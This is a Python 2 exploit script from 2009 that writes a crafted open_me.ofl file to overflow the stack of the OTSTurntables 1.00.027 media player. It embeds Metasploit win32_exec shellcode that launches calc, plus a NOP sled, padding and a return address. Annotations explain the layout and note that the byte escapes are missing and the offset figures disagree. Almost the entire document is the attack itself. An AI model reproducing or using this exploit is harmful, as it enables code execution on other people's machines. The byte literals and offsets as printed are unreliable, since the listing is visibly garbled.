
# Title : OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
# Published : 2009-01-14
# Author : suN8Hclf


#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
#  Discovered & exploited bY suN8Hclf
#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
#  Tested on: Windows XP SP2 Polish, fully patched
#  
#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
#
#  Thanks to Myo and to everyone who knows what hacking really is 
#  Not for money dude, only for fun !!!

# Python 2 script (print statement, raw_input): builds one crafted .ofl file
# and writes it to the working directory as open_me.ofl.  Nothing is
# triggered by running this script itself; the overflow described in the
# header happens only when the vulnerable player later parses that file.
print "====================================================================="
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
print " bY suN8Hclf (crimson.loyd@gmail.com)"
print "====================================================================="

# NOTE(review): every literal below reads "x90", "x75", ... with no
# backslash, so as printed each is plain ASCII text (three characters per
# intended byte) rather than the raw bytes the offset arithmetic assumes.
# The missing escapes look like an artifact of how the listing was
# reproduced (the "\n" in the raw_input prompt is lost the same way) --
# confirm against the original before treating any offset here as exact.
nops = "x90" * 4          # intended as a 4-byte NOP sled ahead of the payload
ret = "x75x52x46";   # call ebx -- the value that lands on the saved return address; the author says it points at a `call ebx`

# Payload per the author's own comment: Metasploit win32_exec, 160 bytes,
# CMD=calc, EXITFUNC=seh, PexFnstenvSub encoder.  The byte values are not
# verified here.
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9"
	"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05"
	"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09"
	"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d"
	"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26"
	"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64"
	"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb"
	"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28"
	"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44"
	"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38"
	"xacx2cxc9x40"
    )
# Filler so that ret starts 276 bytes into the file:
# 4 (nops) + 160 (shellcode) + num = 276, i.e. num == 112.
# The header claims "only 274 bytes for shellcode", which does not match
# 276 - 4 = 272; one of the two figures is off and the page does not say which.
num = 276 - 4 - 160
buff = "x41" * num        # 'A' (0x41) padding up to the return-address slot

# On-disk layout, front to back: [NOP sled][shellcode][padding][ret]
exploit = nops + shellcode + buff + ret
try:
    out_file = open("open_me.ofl",'w')    # opened in text mode ('w'), not binary
    out_file.write(exploit)
    out_file.close()                      # not wrapped in with/finally; an exception above skips the close
    raw_input("nNow open open_me.ofl file to exploit bug!n")   # the leading/trailing "n" are the same lost "\n"
except:
    # Bare except: a bare `except:` in Python 2 catches everything, including
    # KeyboardInterrupt at the prompt, so an unwritable file and a Ctrl-C
    # both collapse into this one uninformative line.
    print "WTF?"
